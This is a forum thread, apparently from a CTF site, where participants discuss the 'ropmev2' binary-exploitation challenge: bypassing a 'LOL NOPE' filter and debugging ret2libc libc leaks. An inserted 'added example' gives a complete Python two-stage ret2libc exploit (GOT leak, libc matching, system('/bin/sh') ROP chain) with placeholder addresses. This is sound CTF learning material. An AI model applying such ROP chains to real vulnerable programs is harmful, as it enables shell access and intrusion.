ropmev2 pwn challenge

Finally… Took me some time to figure out how to bypass the LOL NOPE message. Done leaking and using ret2libc.

@ypl said:
Just did it. Feel free to PM if anyone needs help! I also did this one without leaking libc addresses. Actually I tried leaking, but the addresses I leaked just didn’t match any libc versions in the libc database (I was using libc.blukat.me)… I would much appreciate it if anyone could tell me what is going on with the libc version. Thanks!

Nothing strange with libc, are you sure you leaked them correctly?

I wasted a lot of time on ret2libc, before just setting up a frame and jumping through that instead.

Just finished this awesome challenge! I’ve spent the better part of a week figuring this out, and I learned so much in the process. ROP is truly a beautiful exploitation technique. I wonder if there is any kind of defense against this at all.

The most frustrating part for me was that I put the payload to deal with the mangler up front and, right after it, my code to leak data. It would segfault while outputting said data. All registers were set up correctly; I even made my own version of this binary and there it would work. It took me hours to figure out. In the end, it turned out that rsp was pointing just above my payload and it was printf itself that was mangling my payload.

Probably a n00b lesson, but not one I’ll forget soon.

Anyway, loved the challenge. Multiple techniques involved, multi stage, and a cheeky little twist at the end. Well done, sir.

Hi all.
I need help. I wrote a script that works on my local machine but doesn't work on the remote. I use a two-step exploit: in the first step I find the address of a marker function (printf or read), on libc.bulk.me I find the libc version, and then I get EOF on the second step. When I use the local libc on my local machine I get a shell.
Can anybody give advice on what direction I should dig in?

I've corrected my mistake, so now I get LOL NOPE, but what can I do with it?

@fr0ster , you just need to accomplish the same thing in a different way. DM me if you need more help.

Hey all,

Can anyone explain how I can leak the remote printf() address?
When passing the DEBUG input, the function returns the location of the input buffer. I’m looking at the X64 calling convention and I can’t get how I can use that address to calculate printf() or any other libc function remote address.
The payload is clear in my mind, just need a little hint on this one to continue working.
Any indication or hint would be much appreciated!

Hi guys, could you give me a hint on how to bypass LOL NOPE? I have already tried every command, and I have also tried not using ret2libc, but I still get the LOL NOPE.

Finally got it, thanks @yb4Iym8f88, but I don’t understand why I can’t get the list of files in the directory. I tried it locally and it worked, but not on the remote server.

Done and dusted! That should have been a fairly easy challenge for me… BUT a small bug in my logic allowed my function to work locally but not remotely, so I spent half a day going round in circles confirming that my LIBC version was indeed correct… Let's just say that was FUN!! Thanks to @R4J :slight_smile:

Can I get a PM from anyone on ropmev2? I have gotten the LOL NOPE message and tried using other means of leaking the flag, nothing so far.

Has anyone encountered the problem, when trying to leak addresses of libc functions on the remote server, that all functions have the same address? On my local machine I get different addresses for different functions, but on the server they are all the same. This makes it impossible to determine which libc version is used. I have no clue how the program can work if all entries of the GOT table point to the same address… Any ideas on this?
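Added example, not code from this thread or from the challenge: the bookkeeping behind the two-stage ret2libc that several posts above describe (the two-step exploit that leaks a marker function's address, the question of turning a leaked address into a remote printf()/system address, and the leaks that would not match any libc in a database). Stage 1 leaks a resolved GOT entry, the leak is matched against candidate libcs the way a libc database does (on the low 12 bits, since ASLR only shifts whole pages), the base is derived from the chosen libc, and stage 2 builds the system("/bin/sh") chain. Every gadget address, the buffer offset, and both candidate symbol tables are constructed placeholders for a non-PIE x86-64 binary; none of them belong to ropmev2 or to any real libc build.

```python
"""Two-stage ret2libc bookkeeping for a non-PIE x86-64 binary (constructed example)."""
import struct

# Hypothetical binary-side addresses (constructed, not ropmev2's).
POP_RDI_RET = 0x401263   # gadget: pop rdi ; ret
RET = 0x40101a           # plain ret, used to realign rsp to 16 bytes before calling into libc
PUTS_PLT = 0x401030      # puts@plt, prints the bytes rdi points at up to the first NUL
PRINTF_GOT = 0x404020    # printf@got.plt, holds printf's libc address once it has been resolved
MAIN = 0x401136          # return here so the program reads a second (stage 2) payload
OFFSET = 72              # bytes from the start of the input buffer to the saved return address

# Constructed candidate symbol tables, the kind of data a libc database matches against.
CANDIDATE_LIBCS = {
    "libc-A": {"printf": 0x064E10, "puts": 0x080E50, "system": 0x052290, "/bin/sh": 0x1B45BD},
    "libc-B": {"printf": 0x061C90, "puts": 0x087D80, "system": 0x05BC20, "/bin/sh": 0x1B6E1B},
}


def p64(value):
    """Pack a 64-bit little-endian pointer."""
    return struct.pack("<Q", value)


def u64(data):
    """Unpack up to 8 little-endian bytes (a leaked pointer is usually 6 bytes)."""
    return struct.unpack("<Q", data.ljust(8, b"\0"))[0]


def stage1_leak_chain():
    """ROP chain: puts(printf@got) then return to main for the second payload.

    Leak a function the program has already called: under lazy binding an
    unresolved GOT entry still points into the PLT stub, not into libc.
    """
    return b"A" * OFFSET + p64(POP_RDI_RET) + p64(PRINTF_GOT) + p64(PUTS_PLT) + p64(MAIN)


def parse_leak(output):
    """puts stops at the first NUL; a userland x86-64 pointer is 6 significant bytes."""
    return u64(output[:6])


def match_libc(leaked, symbol):
    """Names of candidate libcs whose symbol page offset matches the leak's low 12 bits."""
    return [name for name, syms in CANDIDATE_LIBCS.items() if syms[symbol] & 0xFFF == leaked & 0xFFF]


def libc_base(leaked, symbol, libc):
    """base = leaked address - symbol offset; a non page-aligned result means a bad leak or libc."""
    base = leaked - CANDIDATE_LIBCS[libc][symbol]
    if base & 0xFFF:
        raise ValueError("base is not page-aligned: wrong symbol, wrong libc, or a bad leak")
    return base


def stage2_system_chain(base, libc):
    """ROP chain: system("/bin/sh") with the stack realigned by an extra ret."""
    syms = CANDIDATE_LIBCS[libc]
    return (b"A" * OFFSET + p64(RET) + p64(POP_RDI_RET)
            + p64(base + syms["/bin/sh"]) + p64(base + syms["system"]))


def simulate(true_base, libc="libc-A"):
    """Round trip against a pretend remote whose libc is `libc` mapped at `true_base`."""
    stage1 = stage1_leak_chain()
    # What puts(printf@got) would print on that remote: 6 pointer bytes and a newline.
    remote_output = p64(true_base + CANDIDATE_LIBCS[libc]["printf"])[:6] + b"\n"
    leaked = parse_leak(remote_output)
    candidates = match_libc(leaked, "printf")
    if len(candidates) != 1:
        raise ValueError(f"ambiguous or missing libc match: {candidates}")
    base = libc_base(leaked, "printf", candidates[0])
    return candidates[0], base, stage1, stage2_system_chain(base, candidates[0])


if __name__ == "__main__":
    name, base, s1, s2 = simulate(0x7F1234567000)
    print(name, hex(base), s1.hex(), s2.hex())
```

If match_libc returns nothing for every symbol you leak, the leak itself is the thing to doubt before the database: check that the printed bytes were taken from the right offset in the output, that the function whose GOT entry you read has actually been called once, and that you are unpacking 6 bytes little-endian rather than a stray newline or prompt text.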

Beware of some rabbit holes :slight_smile:
The author of this challenge is brilliant. I really enjoyed it.